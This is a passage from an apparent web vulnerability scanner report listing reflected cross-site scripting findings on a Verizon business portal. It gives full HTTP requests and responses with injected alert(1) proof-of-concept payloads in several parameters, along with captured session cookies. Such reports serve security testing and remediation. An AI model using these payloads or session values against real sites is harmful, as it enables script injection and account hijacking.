Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:04:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=g8nkMnLcGvJLX2N4QZKHmDs6WMyWg335JTyYJ9tWhnMqG2rwP6l3!-1644393018; path=/
Content-Length: 44703

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<script type="text/javascript"
           src="http://publish.vx.roo.com/verizonsmb/standard/embed/?vxSiteId=16359446-8e33-4088-821a-293e3bfd9acd&vxTemplate=template3.swf&vxChannel=USA Businesscd0c6"style="x:expression(alert(1))"84b307a3ebe&vxClipId=Jpeb1613575&vxBitrate=300&vxFormat=flash">
...[SNIP]...

2.277. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the Channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec523"-alert(1)-"9a0d94fbcaf was submitted in the Channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Businessec523"-alert(1)-"9a0d94fbcaf&ClipId=Jpeb1613575&Format=flash&Bitrate=300&vdoId=1226&isVideoContent=true&portletTitle=Video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:06:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:06:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=PYsNMnJQHjMYj9l3vTbT2k4szz21WGlBCS04WB5gQhnQKKH111TZ!-1644393018; path=/
Content-Length: 80661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<script type="text/javascript">
       document.cookie = "redirect=/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Businessec523"-alert(1)-"9a0d94fbcaf&ClipId=Jpeb1613575&Format=flash&Bitrate=300&vdoId=1226&isVideoContent=true&portletTitle=Video|; path=/";
   </script>
...[SNIP]...

2.278. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [ClipId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the ClipId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1eb9"style%3d"x%3aexpression(alert(1))"23f09aba93f was submitted in the ClipId parameter. This input was echoed as b1eb9"style="x:expression(alert(1))"23f09aba93f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1611930b1eb9"style%3d"x%3aexpression(alert(1))"23f09aba93f&Format=flash&Bitrate=300&vdoId=1225&isVideoContent=true&portletTitle=Video News&FromHeroTab=video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:04:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=yxlPMnLKBcjDLJC7V4LJCVGP6s8G9J2kCbmS2cXpy3VG8j4Ck1nL!-1644393018; path=/
Content-Length: 44703

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
t type="text/javascript"
           src="http://publish.vx.roo.com/verizonsmb/standard/embed/?vxSiteId=16359446-8e33-4088-821a-293e3bfd9acd&vxTemplate=template3.swf&vxChannel=USA Business&vxClipId=Jpeb1611930b1eb9"style="x:expression(alert(1))"23f09aba93f&vxBitrate=300&vxFormat=flash">
...[SNIP]...

2.279. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [ClipId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the ClipId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43a2a"-alert(1)-"6acdefa2b15 was submitted in the ClipId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb160990243a2a"-alert(1)-"6acdefa2b15&Format=flash&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:08:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:08:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=QJhyMnJNGvSMG8Xhd1B3FldcyVJqQRgqSGG22r1pyKBGhrJ3TSQN!-1644393018; path=/
Content-Length: 80661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
t type="text/javascript">
       document.cookie = "redirect=/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb160990243a2a"-alert(1)-"6acdefa2b15&Format=flash&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video|; path=/";
   </script>
...[SNIP]...

2.280. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the Format request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 214f3"-alert(1)-"d210464b723 was submitted in the Format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash214f3"-alert(1)-"d210464b723&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:09:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:09:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=qdlKMnJfy2j9npnqyWhwpYnBVt2cy8nchwJrnCpTXwFKrs5vQhT5!-1644393018; path=/
Content-Length: 80661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
javascript">
       document.cookie = "redirect=/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash214f3"-alert(1)-"d210464b723&Bitrate=300&vdoId=1224&isVideoContent=true&portletTitle=Video|; path=/";
   </script>
...[SNIP]...

2.281. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the Format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c149e"style%3d"x%3aexpression(alert(1))"21838a054ae was submitted in the Format parameter. This input was echoed as c149e"style="x:expression(alert(1))"21838a054ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1611930&Format=flashc149e"style%3d"x%3aexpression(alert(1))"21838a054ae&Bitrate=300&vdoId=1225&isVideoContent=true&portletTitle=Video News&FromHeroTab=video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:05:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:05:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=G1QVMnLbKJnTSnvtnQdkJ5vhFByHzZKqBprT5N9sc7kPqdZ1QQ12!-1644393018; path=/
Content-Length: 44703

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
src="http://publish.vx.roo.com/verizonsmb/standard/embed/?vxSiteId=16359446-8e33-4088-821a-293e3bfd9acd&vxTemplate=template3.swf&vxChannel=USA Business&vxClipId=Jpeb1611930&vxBitrate=300&vxFormat=flashc149e"style="x:expression(alert(1))"21838a054ae">
...[SNIP]...

2.282. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 76cc3(a)7c160de7e31 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal76cc3(a)7c160de7e31/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_support&cat=Contact_Us_Default HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:04:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:04:30 GMT
Connection: close
Set-Cookie: SaasSessionID=2fpGMnLTBmlPqfGNvJQcTRF3v1hSwv9hJyGJ2F1BTH4hnxGJ5bMW!-1644393018; path=/

Resource /SMBPortal76cc3(a)7c160de7e31/smb could not be resolved for locale null.

2.283. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 923dc(a)cae14d5df3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal923dc(a)cae14d5df3e/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=W9dBMnxLblXyp1zMxmh9xXJ5sJ1GhL2yjvRdnpn3RyX2zx0WJDnJ!-1644393018; path=/

Resource /SMBPortal923dc(a)cae14d5df3e/smb could not be resolved for locale null.

2.284. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0137(a)ec58675ea9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbc0137(a)ec58675ea9d?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=p9nBMnxLqJjc3gBG3N24ptCcfRyVf0J3mPQ12GZLG8XXhFcry8CR!-486484779; path=/

Resource /SMBPortal/smbc0137(a)ec58675ea9d could not be resolved for locale null.

2.285. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39791(a)68f42e512fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

